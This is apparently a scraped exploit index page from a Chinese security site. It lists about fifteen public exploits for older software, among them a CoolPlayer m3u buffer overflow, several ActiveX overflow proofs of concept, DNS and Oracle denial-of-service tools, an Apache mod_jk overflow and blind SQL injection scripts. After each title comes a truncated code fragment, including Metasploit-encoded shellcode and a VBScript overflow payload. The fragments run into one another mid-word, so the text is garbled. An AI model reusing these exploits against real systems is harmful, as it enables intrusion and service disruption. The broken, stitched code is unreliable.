网络安全 > Exploit >
CoolPlayer m3u File Local Buffer Overflow Exploit
#!/usr/bin/perl # k`sOSe - 07/29/2008 use warnings; use strict; # http://www.metasploit.com # EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe # [*] x86/shikata_ga_nai succeeded, final size 169 my $shellcode = "xd9xcaxd9x74x24xf4x5Pligg
#!/usr/bin/perl -w use LWP::UserAgent; use MIME::Base64; use Digest::MD5 qw(md5_hex); use Getopt::Std; getopts('h:', %args); print "#############################################n"; print "# Pligg <= 9.9 RemoNCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
----------------------------------------------------------------------------- NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow url: http://www.nctsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shiSimple DNS Plus
#!/usr/bin/perl # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit # # usage: sdns-dos.pl <dns server> <dns source port> <num of packets> # Exploit written by Exodus. # http://www.blackhat.org.il use IOYahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
Yahoo Messenger 8.1 (latest) Remote DoS Safe for Scripting, Safe for Initialize <html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript>Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
<!-- Document Imaging SDK Buffer Overflow Vulnerability DoS Proof of concept Author: r0ut3r Mail : writ3r [at] gmail.com ----------------------------- -Tested on WinXP Pro SP2 Version: 10.95 Vendor :WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <string.h> #include <malloc.h> #include <sys/stat.h> #include <fBea Weblogic Apache Connector Code Exec / Denial of Service Exploit
#// Bea Weblogic -- Apache Connector Remote Exploit -1day #// Should stack break latest Windows Server 2003 <address space randomization> #// BIG THANKS TO #// "dong-hun you"(Xpl017Elz) in INetCop - for his paper #// "TAlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
#/usr/bin/perl #| | Author: GoLd_M #--//--> # -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -- #--//--> Exploit : use strict; use LWP::Simple; print "- - - - - - - - - - - - - - - - - - - - - - - - - -PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
<html> <body> <object id=target classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object> <script language=vbscript> arg1=String(10000, "A") target.StartURL(arg1) </script> <Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
#!/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OIDApache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
#!/usr/bin/python # # _____ _ _ _____ _____ _____ _____ # / ___| |_| | _ | _ | _ |_ _| # | (___| _ | [_)_/| (_) | (_) | | | # _____|_| |_|_| |_||_____|_____| |_| # C. H. R. O. O. T. SECURITY GROUP #HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
#!/usr/bin/perl # k`sOSe - 7/21/2008 # http://secunia.com/advisories/20172 # A sploit for an ancient vuln. Just because i need # to improve my skills on windows explotation. use warnings; use strict; # CMD="c:window